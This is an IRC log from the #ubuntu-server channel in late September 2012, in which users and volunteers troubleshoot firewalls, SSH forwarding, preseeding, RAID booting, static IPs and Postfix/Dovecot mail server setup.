<jdstrand> ufw works very well for a bastion host (see 'man ufw' for usage and examples). it can work well for a routing firewall too, but you need to dig in a bit more (again, see 'man ufw-framework')
<drag0nius> looks like i want to have that server transparent except few services ports
<drag0nius> so instead of connecting to server everything would connect to my comp by default
<drag0nius> any ideas on what i'm actually looking for?
<uvirtbot> New bug: #1053790 in glance (main) "Problem installing glance registry: ImportError: No module named setuptools.command" [Undecided,Fix released] https://launchpad.net/bugs/1053790
<drag0nius> nobody? ;/
<SpamapS> drag0nius: I'm not sure I understand what you want
<drag0nius> i want to expose computer i'm using to internet
<drag0nius> so if i put external ip it would access my comp
<drag0nius> except for some services im running on server
<drag0nius> i know ports of all services running on server, but i dont know ports which are used by some games/programs im using
<drag0nius> so i would use port forwarding to access server's resources
<drag0nius> and everything else would go to specified internal ip
<drag0nius> still don't get what i want to achieve?
<drag0nius> in routers it's achieved by setting up DMZ
<hallyn> smb`: we're busy and all, but i thought the info in last comment of bug 1047531 is very interesting.  if it rings any bells, pls lemme know
<uvirtbot> Launchpad bug 1047531 in qemu-kvm "Ubuntu 12.04 (Precise) guests can't boot on Ubuntu 10.04 (Lucid) QEMU-KVM host" [High,Confirmed] https://launchpad.net/bugs/1047531
<Shanne> tjgijtg
<Shanne> Holii
<xnox> anybody knows a good RSS to IRC bot?
<tsimpson> xnox: supybot, it comes with an RSS plugin
<xnox> tsimpson: thanks.
<drag0nius> is there some upnp igd soft for ubuntu?
<RoyK> !upnp
<ubottu> To stream media to other UPNP aware devices (such as the Xbox, PS3, or iRadio) you need a UPNP server. See !info mediatomb for information regarding the MediaTomb package
<drag0nius> i need it for port forwarding
<RoyK> google it - iirc there are solutions for that
<sarnold> drag0nius: apt-cache search igd
<sarnold> drag0nius: looks like at least three programs and several libraries. :)
<drag0nius> i guess such soft just "plain forwards" without any extras?
#ubuntu-server 2012-09-28
<uvirtbot> New bug: #1057847 in tftp-hpa (main) "package tftpd-hpa 5.2-1ubuntu1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/1057847
<pentagon> How can I run dhclient and request host-name and see if anything returns, is there a tail command ?
<sarnold> pentagon: if you add -v to the dhclient initscript, it'll log more verbosely. I'm not sure if it'll log returned hostname or not, but it's the first thing I'd try
<tohuw> Is there any package providing Apache 2's mod_xml?
<tohuw> Ah, just discovered apt-file. And it seems the answer is no D: Compiling time...
<tsimpson> tohuw: may I introduce you to http://packages.ubuntu.com/
<sarnold> apt-file is faster :)
<tohuw> tsimpson: I could not find a fast way to search for what I needed to know using that site.
<tsimpson> look at the "Search the contents of packages" section
<tohuw> Ah, fair enough
<pentagon> well long day of playing with things
<pentagon> still havent got it to function the way i'd like
<tcp_cungkr1nk> hi, im not installed squid on my ubuntu server, but the nmap result from public network seem like that :
<pentagon> how do I do a dns lookup on myself to see what returns as hostname
<tcp_cungkr1nk> 3128/tcp open squid-http
<tcp_cungkr1nk> 8000/tcp open http-alt
<tcp_cungkr1nk> 8080/tcp open http-proxy
<tcp_cungkr1nk> 8088/tcp open unknown
<pentagon> tcp_cungkr1nk: you didn't install it?
<tcp_cungkr1nk> yes, i dont know why?
<pentagon> try to connect and se what it is
<pentagon> nmap me and pastebin the results
<pentagon> favor for favor
<pentagon> nmap me
<pentagon> tcp_cungkr1nk: nmap me and paste the results
<pentagon> tcp_cungkr1nk: did you nmap me
<pentagon> nmap me and pastebin it
<harushimo> question for everyone. I'm setting up ubuntu server but it will have drupal on it
<harushimo> on my vm
<harushimo> is there to access the drupal website threw the vm?
<harushimo> I mean when I setup the site
<pentagon> Avoid drupal.
<pentagon> html is better keep it simple
<harushimo> just curious why avoid drupal?
<harushimo> I thought it was pretty good from what I hear
<harushimo> html is better
<harushimo> I know that
<koolhead17> hi all
<MACscr> can i move to 12.04 LTS from just 11.04?
<tsimpson> MACscr: no, you need to go via 11.10
<MACscr> yeah, i had forgotten about that version. Im up to precise now
<MACscr> though it looks like my vps isnt fully booting
<Firefishy> micahg: You previously helped me with amd64-microcode backport req bug: https://bugs.launchpad.net/precise-backports/+bug/1036618
<uvirtbot> Launchpad bug 1036618 in amd64-microcode "Please backport amd64-microcode 1.20120910-1 (multiverse) from quantal" [Undecided,Confirmed]
<Firefishy> Anything further I should do? Builds OK, Installs OK, Tests OK.
<uvirtbot> New bug: #1058081 in libaio (main) "libaio ftbfs on armel/armhf" [High,Confirmed] https://launchpad.net/bugs/1058081
<qw[Russian]> hi, everybody
<qw[Russian]> I have a question: I would like to create a dating site on a free hosting prompt please if know the such?
<micahg> Firefishy: I haven't had a chance to look at backports this week yet, I do see the request in the queue
<Firefishy> micahg: cool. appreciated.
<uvirtbot> New bug: #996166 in cloud-init "installs wrong package in cc_salt_minion.py" [Medium,Fix committed] https://launchpad.net/bugs/996166
<RobZ1> hi - how can I update the root CA certificates (provider by VeriSign on their website)?  Ubuntu 10.10
<smoser> ok... in case someone thought i hadn't ranted enough lately
<smoser> $ ssh -L 10080:localhost:80 10.55.60.56
<smoser> ...
<smoser> Port forwarding is disabled to avoid man-in-the-middle attacks.
 * Daviey thinks you have been losing your touch.
<smoser> but it puts me happily at a prompt at the other end.
<smoser> I *DO NOT READ ERROR MESSAGES*.  if I asked for port forwarding, and port forwarding doesn't work, i probably want you to fail
<Daviey> smoser: I think that is your ssh config?
<smoser> really?
<hallyn> jdstrand: mdeslaur: do i understand right there is a pending libvirt update in precise-security?  (if so i'll hold off on a new sru, of course :)
<mdeslaur> hallyn: nope, no current libvirt security update planned
<hallyn> mdeslaur: oh cool, thanks
<zul> hallyn: what did you want me to upload?
<smb> hallyn, If you are about to do other things with libvirt (admittedly I have not looked for a while now), there was a patch about not considering xenfs being available as fatal (because we load it as a module later). It was dropped on some rebase and should be relatively simple to re-activate (just upstream changed spaces around it).
<hallyn> zul: augeas
<zul> hallyn: debdiff please
<hallyn> zul on bug https://bugs.launchpad.net/bugs/1054306
<uvirtbot> Launchpad bug 1054306 in netcf "ncftool list fails" [High,Invalid]
<hallyn> smb: is this for q or p?
<hallyn> if for q, i'm not doing anything right now
<smb> hallyn, for q
<smb> ah
<hallyn> zul might have something but i don't think so
<hallyn> need to run, biab
<smb> He may have had but those security guys always upload stuff... :-P
<hallyn> smb: :)
<r3boot> hi ppl :) I't seems that preseeding is broken for 12.04, the 'Detect keyboard layout' part. No matter what I try to feed d-i or the kernel params, I cannot get rid of this question. I've tried adding 'console-setup/layoutcode=us' as a kernel parameter, and it does not work. I've tried adding 'd-i console-setup/ask_detect boolean false' to my preseed file, and that does not work as well
<r3boot> I've queried both google and launchpad to try to figure this out, but both of them do not give any results regarding this specific question
<r3boot> (and the answers I do find do not work :)
<r3boot> so .. Am I doing something stupid, or do I need to file a bug?
<SpamapS> roaksoax: you've been doing quite a bit of pre-seeding of 12.04, haven't you?
<SpamapS> roaksoax: ^^ r3boot seems to be having trouble
<SpamapS> rbasak: you too
<rbasak> r3boot: are you setting priority=critical?
<roaksoax> r3boot: you might want to try adding priority=critical in the kernel command like
<r3boot> ack, hold on
<r3boot> does that restrict d-i to only ask the most critical questions?
<rbasak> correct
<rbasak> which should be nothing unless some step fails
<r3boot> lets see what it does. The HW in question (a relatively new Dell R720) is a bit slow in booting tho
<henkjan> r3boot o/
<r3boot> jow henkjan :)
<r3boot> rbasak, roaksoax, that works, thnx a lot!
<rbasak> \o/
<r3boot> but now the other thing. This smells like a workaround, working around something broken in d-i or console-setup. Do I need to file a bug for this?
<r3boot> (in the mean time I'm going to run to the train btw, brb)
<Auckla> Man there was a way I use to connect to my server at home I can't think about it now. So I can use X over SSH.
<Auckla> What are some good ways to connect to X over SSH?
<r3boot> ssh -x (or -X, or X11Forwarding yes in ssh-config)
<sarnold> if you just want to run one program, ssh -X hostname xterm
<Auckla> There was a program or is a program I use at home, with a giant red x on it. :)
<RoyK> ssh -y
<Auckla> I'm sure it is common.
<RoyK> with ssh -x, it loses authorization after a while and you'll have to reconnect
<holstein> theres http://www.nomachine.com/ or freenx Auckla
<Auckla> AHHH!! FreeNX that is what it is.
<RoyK> or better, set 'ForwardX11 yes' and 'ForwardX11Trusted yes' in your ssh config
<RoyK> ah, freenx ;)
<Auckla> Thi s is just a suggestio nfor a fellow employee on his learning adventures in *nix.
<RoyK> Auckla: remove all other editors than vim ;)
<Auckla> I don't think he would like that.
 * RoyK feels a bit evil
<Auckla> He was already trying to play with "VI". Hehehe.
<RoyK> http://karlsbakk.net/fun/editor-learning-curve.jpg
<RoyK> Auckla: just toss vimtutor on him, let him use half an hour on that, and he'll know the basics
<sarnold> the chart is a lie
<sarnold> vi is always steep even to experts
<RoyK> that's what it says
<RoyK> you have to climb a bit before it gets useful
<RoyK> but indeed, it's a lie, because once vim, which is the current, turns out useful, you keep on learning all other stuff they put in there, so it should be a slow slope after the initial steep jump
<sarnold> RoyK: exactly
<uvirtbot> New bug: #1058237 in irqbalance (main) "quantal irqbalance missing MSI interrupts" [Undecided,New] https://launchpad.net/bugs/1058237
<methods1> any reason /etc/cron.daily would not run my script ? i made it add a file which never showed up to prove that it's not running.. i see the entry in /etc/crontab which means it should run
<hallyn> methods1: anything in /var/log/syslog?  what exact entry did you add?  can you pastebin the script also?
<methods1> well i see hte line in syslog saying it's going to run them but nothing else
<methods1> CRON[5106]: (root) CMD (test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ))
<methods1> that's all i see and then nothing else
<methods1> anacron test returns 1
<escott> methods1, did you make the script in daily executable
<escott> methods1, is it properly owned by root?
<methods1> hm i just found a post that says it's because the file has a dot in it's name
<methods1> it ends in .sh
<hallyn> smb: btw is bug 914788 the one you were talking about before?
<uvirtbot> Launchpad bug 914788 in libvirt "libvirt expexts qemu-dm in wrong path for xen" [Undecided,Fix released] https://launchpad.net/bugs/914788
<hallyn> dannf: hey, can you post a debdiff for qemu-linaro against precise for bug 1030594 ?  (if you did, sorry, i don't see it)
<uvirtbot> Launchpad bug 1030594 in qemu-linaro "[FFE] enable flat device tree support" [Medium,In progress] https://launchpad.net/bugs/1030594
<zul> hallyn:  didnt i aready upload this augeas upload?
<hallyn> zul: no, you did the fakesync, but not this bugfix
<zul> hallyn: ah yes
<moonpup> is it possible to setup your own "whois server" and if so anyone here ever do it?
<zul> hallyn: done
<hallyn> zul: thanks!
<uvirtbot> New bug: #1058301 in etckeeper (main) "error is displayed if no changes are good to commit on post-install" [Undecided,New] https://launchpad.net/bugs/1058301
<Z___> hi
<ztta> is anybody reading this?
<Troy^> hi
<Troy^> Yes, we can read it lol
<ztta> Ok
<ztta> i wanted to ask if there is any way to make data transfer via ssh faster
<Troy^> Not everyone is always active here, most people are idle
<Troy^> ztta meaning sftp?
<ztta> yes, ssh-ftp and i use ssh as internet proxy
<ztta> in both cases using different client programs i get 750kbit/sec
<Troy^> ztta: i assume this is internal network?
<ztta> no
<ztta> mostly not
<Troy^> .....
<Troy^> what are your bandwidth capabilities of yourself and your host?
<ztta> 3,3 mbyte/sec i
<ztta> and 20mByte/sec or more (idk. exactly) host
<Troy^> ok there you go
<ztta> i can get full 3,3 mbytes via http
<ztta> to the server
<Troy^> ok http upload?
<ztta> 0,33 mbytes
<ztta> my point is: why is ssh so much slower than ssl?
<Troy^> you can only upload as fast as your upload connection plus there is many other variables
<ztta> i did not confuse upload and download
<Troy^> you said http not ssl
<ztta> i meant http over ssl
<ztta> https
<ztta> does that make any difference?
<Troy^> you know i have no idea.. i don't have problems using sftp on my internal network
<ztta> i only know https is more than 4 times faster than ssh
<ztta> and i wonder why
<ztta> and if i can change that
<Troy^> most likely you probablly can't
<Troy^> encryption requires overhead
<ztta> :(
<ztta> but ssh uses aes
<ztta> after handshake
<ztta> and https uses
<ztta> aes , too
<Troy^> http://www.mydigitallife.info/slow-sftp-transfer-speed-with-ssh-connection-ssh2/
<patdk-lap> ssh may use aes, are you sure it's really using it? and using it with aes-ni support?
<patdk-lap> without aes-ni support your going max out at 60MB/sec
<patdk-lap> hmm, I haven't seen aes used for https for most people
<patdk-lap> cause it leaves you vaunerable, so normally it's md4
<ztta> for ssh i am quite sure i am using aes
<ztta> for https i am not that sure
<ztta> but i always thought it was used
<ztta> and what does that have to do with md4, md4 is a hash function
<ztta> i have read about an attack against https which targeted aes
<patdk-lap> md4 is hash? when?
<patdk-lap> rc4 I mean :)
<patdk-lap> heh, too many names
<ztta> md4 is long broken^^
<ztta> idk. about rc4
<patdk-lap> use rc4 cause it's not a chain chipher to protect from beast attack
<patdk-lap> so almost everyone enforces it's use by default, unless you don't support rc4
<patdk-lap> hmm, are you sure your getting 3.3mBytes and not 3.3mbits over https?
<ztta> 3,3 mBytes
<Troy^> lol
<ztta> ok most of the time only 2,9mBytes
<hallyn> stgraber: hm, (on i386 quantal) lxc python apitest is failing on getting ips
<hallyn> oh wait, well, there's no dnsmasq running for lxcbr0
<ztta> using sshftp it is only 0,6 or so
<ztta> i have thought of using ftp, but it is not encrypted :(
<ztta> and also i want to use the server as proxy into the usa for streaming
<stgraber> hallyn: hehe, no dnsmasq would explain it :)
<ztta> but ssh is too slow
<hallyn> stgraber: but why isn't it starting, hmm
<ztta> i get 0,6 mbyte constantly for both: sshftp and internet proxy
<ztta> :(
<patdk-lap> what is sshftp?
<ztta> ssh file transfer protocol
<patdk-lap> sftp?
<ztta> yup
<hallyn> oh well after the fact it wasn't starting bc lxcbr0 was up (and it wasn't shutting that down bc dnsmasq wasn't running - vicious circle)
<hallyn> wonder what messed it up to begin with
<hallyn> no OOM killer msgs
<ztta> i write sshftp to avoid confusion with simple file transfer protocol
<stgraber> hallyn: /var/log/upstart/lxc-net.log should be useful to debug that kind of mess
<hallyn> stgraber: but now it does start up :(
<ztta> is there an alternative ssh server i could install?
<ztta> other than the standard sshd
<patdk-lap> there are several
<patdk-lap> though dropbear is normally always slower, by like 10x
<ztta> i already tried to enable encryption in vsftpd
<hallyn> stgraber: well, i don't grok why, but apparently the qa-regression-testing 'test-libvirt.py setup-net' sent it a SIGTERM.  <shrug>
<ztta> but somehow my client won't connect anymore
<stgraber> hallyn: fun...
<hallyn> ah haha
<hallyn> there it is.  "effing kill all dnsmasqs"
<hallyn> shoulda guessed
<patdk-lap> ftps doesn't work behind nat
<hallyn> (or, translated,     testlib.cmd(['sudo', 'killall', 'dnsmasq'])
<ztta> patdk-lap: good to know
<ztta> back
<ztta> I am trying to run a program i just compiled.
<ztta> It's an elf file
<ztta> -bash: program.elf: command not found
<ztta> the file exists in my local directory
<patdk-lap> did you use ./
<ztta> no
<patdk-lap> it's not windows
<patdk-lap> current path isn't searched
<ztta> yay
<ztta> you are right, it's not windows
<ztta> but thanks, works
<ztta> onother problem:
<ztta> *another
<ztta> how do i run it in background
<ztta> even after closing the terminal?
<sarnold> ztta: depends on program; sometimes 'nohup ./executable &' is sufficient
<sarnold> ztta: some programs have command line switches or config file switches to daemonize
<ztta> only command line
<sarnold> ztta: some programs just never handle that well and need to be run in screen or tmux
<ztta> the program does not daemonize itself
<ztta> and has command line switches
<ztta> but no config
<sarnold> try 'nohup ./foo &' first. If that works, that's easy.
<ztta> seems to work
<ztta> thx a lot
<sarnold> woo :) you're welcome
<uvirtbot> New bug: #996358 in juju "juju probably should be using lxcbr0 instead of depending on libvirt-bin and using virbr0" [Low,In progress] https://launchpad.net/bugs/996358
<cincinnatus> Does anyone know if there's a good Web based control panel for Ubuntu servers out there
<sarnold> cincinnatus: something like landscape.canonical.com?
<cincinnatus> More like webmin but more modern
<cincinnatus> I tried zentyal, but it seemed too cpanelish
<cincinnatus> Its Web server admin module is so basic that it seems easier/quicker to set up suited the old school way in the command line
<cincinnatus> I'm managing one Amazon micro instance, not a big cloud
<cincinnatus> So landscape is out
<Auckla> So I have unbuntu server 12.04. I have ten static ip's. How do I go about adding each ip via cli?
<Auckla> I got the one, I remember back in the day doing something ifconfig eth0 10.10.10.1x255.255.0.0  ifconfigh eth0 10.10.10.2x255.255.0.0 etc etc.
<sarnold> that still works, you can also use the newer ip(8) interface
<Auckla> sarnold: Thanks.
<sarnold> I think you can make these changes persistent via /etc/network/interfaces
<qman__> yes
<qman__> you can add them with ifconfig or ip, but those will not be persistent unless you add them in /etc/network/interfaces
<Auckla> http://www.liberiangeek.net/2010/09/create-multiple-static-virtual-ip-addresses-ubuntu-10-10-maverick-meerkat/
<Auckla> Found that link seems right?
<Auckla> Been like ten years.
<qman__> yes, that is the correct way to add them to /etc/network/interfaces
<qman__> this style of networking configuration is how debian and debian-derived systems do it (ubuntu)
<qman__> ten years ago you were probably using redhat, which does things way different
<Auckla> Slakware.
<Auckla> I'm not a fan of redhat.
<qman__> neither am I
<Auckla> Seems like veroyn around me these days loves cent0s.
<Auckla> I ran slakware 4-7.
<Auckla> Failed to bring up eth0:1.
<Auckla> my config
<Auckla> http://pastebin.com/ntfLdUai
<qman__> can't have the same gateway twice
<Auckla> Ahhh.
<qman__> if they're all on the same subnet
<Auckla> They are.
<qman__> skip the gateway and dns stuff, just do the address and netmask
<qman__> for all but the first, that is
<Auckla> Hurray for Jesus!
<Auckla> Thank you!
<Auckla> qman__: ! :D
#ubuntu-server 2012-09-29
<nerd> do ubuntu-server uses packages as old as debain ??
<andol> nerd: All depends on how recent release you are using, etc. Yet, given that Ubuntu releases happens more frequently than Debian releases it is more likely that the latest regular Ubuntu release will contain more up-to-date packages I guess.
<andol> nerd: Feel free to compare for yourself - http://packages.ubuntu.com/, http://packages.debian.org/
<nerd> is ubuntu server quite stable compared to debian ?
<stooj> Can anyone suggest a way of sharing/streaming a music library over a network? I used to use firefly but the project seems dead now.
<pentagon> How can I update my hostname according to a reverse dns record the dhcp server is sending the wrong hostname
<pentagon> I think it is going to need a script, so shot in the dark, does anyone have a script that will do this?
<pentagon> Ive seen them out there for other distros and so forth.
<pentagon> lol
<mac_nibblet> HIho people!
<mac_nibblet> I followed this guide on setting up a bridge networked for testing our virtualization
<mac_nibblet> but when ever i add the configuration for br0 and restart the network (Throught the command listed, but the OS ssays is depreacated?)
<mac_nibblet> the network just dies
<cloakable> Does anyone here use the Pyroman firewall? Got a NAT question
<mac_nibblet> Anyone awake :(?
<cloakable> I am
<mac_nibblet> ever done any network bridge for virtual machines o.0
<mac_nibblet> ? :P
<cloakable> nope
<pmatulis> cloakable: you want to change your hostname?
<cloakable> pmatulis: nope
<pmatulis> cloakable: what then?
<cloakable> I'm not sure how to setup NAT using Pyroman. The examples aren't exactly clear, and there's zero documentation.
<cloakable> Hell, the XML examples aren't complete :P
<pmatulis> cloakable: never heard of pyroman.  if you do not want to use iptables directly then the next thing i suggest using is ufw
<pmatulis> https://help.ubuntu.com/12.04/serverguide/firewall.html
<cloakable> I looked at that, it doesn't seem hugely useful for more complex setups. eth0 external, eth1 internal, with tunnel* as vpn tunnels :P
<patdk-lap> ufw is almost the same as iptables directly
<patdk-lap> shorewall is a nice abstract for it though
<cloakable> Yeah, I'm torn between shorewall and pyroman. Pyroman seems simpler, though. I may look at shorewall again though.
<patdk-lap> looks confusing
<patdk-lap> shorewall has examples for most cases already in doc/shorewall/examples
<cloakable> Yea, shorewall is much better documented
<gyre007> is there any way guys how I can creat a Ubuntu boot disk on my USB disk without wiping out any data from it ?
<LinuxAdmin> hi guys
<LinuxAdmin> I'm getting troubles with ubuntu server 12.104 installation
<LinuxAdmin> I installed software RAID partitions and I connote boot after updates
<LinuxAdmin> I get grub rescue command prompt
<LinuxAdmin> I tried a lot of things
<RoyK> LinuxAdmin: detail your setup
<RoyK> md raid or lvm?
<LinuxAdmin> not install raid on first partition of the disk, reserve some space on the end of the disk for grub metadata
<LinuxAdmin> md raid
<LinuxAdmin> I made raid during installation
<RoyK> my favourite setup is: use a small mirror for /boot, use a larger mirror for / and use lvm on it for easy expansion, use raid-5 or -6 on data on separate drives
<LinuxAdmin> I already installed previous versions of ubuntu server completely on raid partitions and I got no error
<RoyK> you can't boot from raid-[56]
<LinuxAdmin> I already created the first partition without raid and mounted /boot on it
<LinuxAdmin> t's the same
<LinuxAdmin> I get grub rescue command prompt
<RoyK> type "exit"
<RoyK> something might be screwed up
<RoyK> earlier versions of 12.04 had an issue with mdadm starting too quickly, not waiting for udev to finish its work
<LinuxAdmin> I installed from scratch a few times
<RoyK> that's fixed in 12.04.1
<RoyK> so type "exit" and let the system boot up, if it can
<LinuxAdmin> the first times it could boot after installation, but after automatic updates I could not reboot anymore
<LinuxAdmin> today I tried to install it and just after the installation I went to grub rescue
<RoyK> did you try to type "exit" to let the system continue?
<RoyK> do you read me?
<LinuxAdmin> RoyK I didn't tried it
<RoyK> try
<RoyK> default installation of ubuntu 12.04 is to jump into busybox if a drive fails, which is bogus IMHO
<RoyK> you should change that
<LinuxAdmin> how can I change that?
<RoyK> https://wiki.ubuntu.com/BootDegradedRaid
<LinuxAdmin> I will read it
<LinuxAdmin> thanks RoyK
<RoyK> np
<LinuxAdmin> RoyK, the page you supply is talking about booting a degraded raid array, that's not my case
<LinuxAdmin> I ccnnot even boot
<LinuxAdmin> I'm not at the office and I cannot try running "exit" on grub rescue command prompt, but I'll try it
<RoyK> ok
#ubuntu-server 2012-09-30
<DarkStar1> hello has anyone here managed to install courier mailserver on 12.04? I am having issues with the webadmin interface. not loading
<Sprocks> my grub menu stays on screen, can someone help? I changed the timeout to 0 already
<nsudo> can i share my samba shares over internet ?? how do i configure my router??
<andol> nsudo: The question isn't so much if you can share samba over the Internet as if you really want to share Samba over the Internet...
<nsudo> well i need my brother to see some home videos he is miles away! they are around 500 gb andol
<andol> nsudo: Making them availible across SFTP seems like a much better option, and if he wants to mount the share he can use something like sshfs for that.
<nsudo> and andol what about settings in router?
<andol> nsudo: I have really no idea what the current configuration is on your router, nor how to change whatever might be needed on it.
<nsudo> and andol can it be done just by port forwarding?
<andol> If you are running a standard NAT setup, yes, then "port forwarding" is most likely what you want to use.
<nsudo> and andol thx
<greenowl> hello
<greenowl> is anyone here?
<greenowl> names
<greenowl> hello?
<greenowl> quit
<ejv> hello, this evening I upgraded from 10.04 to 12.04 and (among other things) it has run amuck on my software raid (mdadm). It fails to assemble, complaining about "invalid raid superblock magic on /dev/sdXX". This array however was *just working* 2 hours ago under 10.04. How do I salvage this mess without losing data? Thanks.
<pentagon> What key ID do you use to verify the md5sums?
<pentagon> What key ID do you use to verify the md5sums of ubuntu 12?
<pentagon> What key ID do you use to verify the md5sums of ubuntu 12?
<pentagon> What key ID do you use to verify the md5sums of ubuntu 12?
<DarkStar1> Hi anyone here worked with courier mail servers? I'm trying to migrate a server from one to another
<pentagon> What key ID do you use to verify the md5sums of ubuntu 12?
<pentagon> What key ID do you use to verify the md5sums of ubuntu 12?
<pentagon> What key ID do you use to verify the md5sums of ubuntu 12?
<TJ-> pentagon: "gpg --verify MD5SUMS.gpg MD5SUMS" will tell you the Key ID
<pentagon> TJ-: what key id do you use?
<TJ-> pentagon: The command will tell you!
<pentagon> TJ-: its about making sure
<pentagon> What do you use.
<TJ-> pentagon: That's how you make sure
<pentagon> Make sure of what?
<pentagon> I don't think anyone understands how things work.
<pentagon> Or you are just harassing me more.
<pentagon> What are you trying to prove?
<pentagon> Intelligence bieng frowned upon causes discomfort?
<TJ-> You get the key-ID from the command. You look-up the key on the keyserver. You examine the keys that have signed the key to be sure it's one you're prepared to trust.
<pentagon> Ok, you have made your point.
<pentagon> I am uncomfortable.
<TJ-> https://help.ubuntu.com/community/VerifyIsoHowto
<pentagon> Are you a link bot?
<pentagon> I asked a focused question.
<pentagon> Is #defocus this whole network ?
<pentagon> What key ID do you use to verify the md5sums of ubuntu 12?
<TJ-> I've just told you
<pentagon> is it a hard question ?
<pentagon> look in your .gpg folder
<pentagon> tell me the KEY ID
<pentagon> What key ID do you use to verify the md5sums of ubuntu 12?
<pentagon> do you sopeak english?
<pentagon> do you understand these words?
<pentagon> KEY ID
<pentagon> its a short string
<pentagon> KEY ID
<pentagon> do you know how to check TJ ?
<pentagon> look in your .gpg folder
<TJ-> pentagon: I've told you how to get the key ID, and how to verify it via the web-of-trust. That is how a security-conscious admin verifies the key - not by asking anonymous IRC chatters which key ID they use.
<pentagon> TJ-: dont make assumptions
<pentagon> I asked a question because I want to know the answer to my question.
<pentagon> Don't play the I know better than you game of the 90's
<pentagon> this is 2012 everyone on irc isnt a sucker anymore
<pentagon> fool me once shame on you
<TJ-> pentagon: I'll let you find other answers seeing as you don't like mine.
<pentagon> What key ID do you use to verify the md5sums?
<pentagon> Do you see how you havent answered?
<pentagon> Are you a robot??
<TJ-> !polite | pentagon
<ubottu> pentagon: The people here are volunteers, your attitude should reflect that. Answers are not always available. See http://wiki.ubuntu.com/IRC/Guidelines
<pentagon> ARe you not programmed to answer my question?
<pentagon> volunteer or not
<pentagon> you dont need to ramble on
<pentagon> if you dont want to answer MY question then dont
<pentagon> dont give me an answer to another question I DID NOT ASK
<pentagon> now please let someone else respond if you will not answer
<Doonz> !polite | pentagon
<ubottu> pentagon: The people here are volunteers, your attitude should reflect that. Answers are not always available. See http://wiki.ubuntu.com/IRC/Guidelines
<pentagon> Anyone else out there? What key ID do you use to verify the md5sums?
<pentagon> TJ-: can I give you some advice?
<DarkStar1> Hi anyone here worked with courier mail servers?
<DarkStar1> Anyone alive here?
<dsavi> me, sort of
<TJ-> DarkStar1: I used to, but now I use Dovecot
<dsavi> TJ-, I know exactly what you mean
<DarkStar1> TJ-: why did you switch?
<dsavi> it was not an informed decision
<DarkStar1> I need to setup a mail server and migrate an existing server by the end of today :(
<TJ-> DarkStar1: not reliable enough. too many changes in the code base. config files all over the place. Not so easy to administer for fire-and-forget deployments
<TJ-> DarkStar1: Postfix+Dovecot (or +Courier) will do Maildir-style mailboxes
<DarkStar1> Guess I'll give dovecot a try then. I've been struggling with this all day
<TJ-> DarkStar1: which part is causing you grief?
<DarkStar1> Well I thought I had the mysql authentication sorted
<DarkStar1> as I was given aa dump of a mailbox but I can't seem to autheticate with it
<DarkStar1> TJ-: even the webadmin doesn't work
<TJ-> DarkStar1: I recall having 'issues' with mysql auth on courier years ago now; don't recall how I solved it though
<DarkStar1> can dovecot authenticate via mysql?
<TJ-> DarkStar1: all I can recommend, is pay close attention to the log-files, turn on maximum debug logging, and use Google copiously to understand things!
<DarkStar1> TJ-:  I have been doing thsat for 24hrs+ now and still not moved forward :)
<TJ-> DarkStar1: Yes
<TJ-> DarkStar1: ouch :( Rings bells for me, that does!
<DarkStar1> Awesome!! DO you have a decent doc for setting this up I can follow. I don't have many hows of the day left to do this. and I still have to learn how to use the imapsync tool I bought earlier
<DarkStar1> many hours* not hows :)
<TJ-> DarkStar1: will this help? http://wiki.dovecot.org/HowTo/DovecotLDAPostfixAdminMySQL
<TJ-> DarkStar1: There's also this Linode guide for Ubuntu (based on 10.04 but its almost identical for 12.04) http://library.linode.com/email/postfix/dovecot-mysql-ubuntu-10.04-lucid
<DarkStar1> Cheers dude/dudette. I'll get installing right now
<DarkStar1> TJ-: what's the quickest way to test if the imap server is running? I haven't allocted a name for the server yet so it's only via ip
<TJ-> telnet to its port
<DarkStar1> TJ-: thx
<samba35> when i am trying to upgrade my system i am gettting lot of error
<dsavi> can someone help me setting up smtp with postfix?
<samba35> E: Sub-process /usr/bin/dpkg returned an error code (1)
<samba35> this is last line of error
<samba35> how do i clear apt cache and rebuild apt database
<RoyK> try apt-get install -f or dpkg --configure -a
<RoyK> apt-get clean && apt-get update
<samba35> ok
<samba35> hmm same error ,is it becase of i am behind a firewal ? but i am able to update other ubuntu update but some package are still giveing same error -inface some days back i did update for 100+ mb and it work
<dsavi> can someone help me with this? telnet mydomain.com smtp works from my local internet connection, but it refuses connection requests from other places
<dsavi> the port is open according to nmap
<TJ-> dsavi: what do the mail logs show? (/var/log/mail*)
<dsavi> TJ-, successful connection: postfix/smtpd[23208]: connect from <redacted>[<ip address>]
<dsavi> TJ-, but the unsuccessful connections don't show up
<TJ-> dsavi: So they're being rebuffed by the firewall maybe?
<dsavi> TJ-, it's possible, I don't know how to check that
<dsavi> TJ-, I made an iptables rule to accept traffic on *:25, although it was a copied/pasted command so I don't know how well it worked
<TJ-> dsavi: Are you, by any chance, trying to connect to port 25 of a consumer ISP? Many ISPs block port 25 incoming (and some, outgoing) to prevent open spam relays
<dsavi> TJ-, I'm telneting from one of my vpses to an linode instance where postfix is running
<dsavi> and that's unsuccessful
<TJ-> Linode? Well they don't block. To be clear, you've confirmed that postfix will accept external connections?
<TJ-> dsavi: What I'm getting at is, where are the 'other places' you talked about that fail to connect? Could they be blocked for outgoing port 25 by ISPs?
<dsavi> TJ-, I tested from two VPSes, one at dreamhost and the other from godaddy or something
<dsavi> TJ-, and then from my mobile broadband connection which I'm currently using, also the only one that made a successful connection
<TJ-> dsavi: The way I'd test it is to set up a simple tcp server on a different port than 25, and see if you can telnet onto it instead
<TJ-> dsavi: This post shows how to use netcat for that: http://ubuntuforums.org/showthread.php?t=828870
<dsavi> TJ-, would dovecot count? telnet mydomain.com pop3 works from everywhere
<TJ-> dsavi: Yes
<TJ-> dsavi: Sounds like port 25 being blocked somewhere then. Try accessing another well-known SMTP server from Dreamhost/Godaddy to see if they are blocked
<dsavi> TJ-, could it have anything to do with what mynetworks is set to in postfix/main.cf?
<dsavi> I don't know what that config option does at all
<TJ-> dsavi: Yes. But if that was responsible you'd see log entries in mail.error or similar log-file
<DarkStar1> TJ-: did you setup dovecot with mysql?
<DarkStar1> sorry to interrupt. I am a bit pushed for time. :(
<TJ-> DarkStar1: Only for testing - I use Unix accounts
<DarkStar1> TJ-: were your tests successful?
<TJ-> DarkStar1: yes
<DarkStar1> Cool. Can you remember or give hints as the which were the critical files to modify to get it working?
<TJ-> I can't sorry. I know I didn't have any issues doing it - it was all straightforward
<DarkStar1> I was looking at the sql-conf file and I'm a little confused with the differences between some query sections
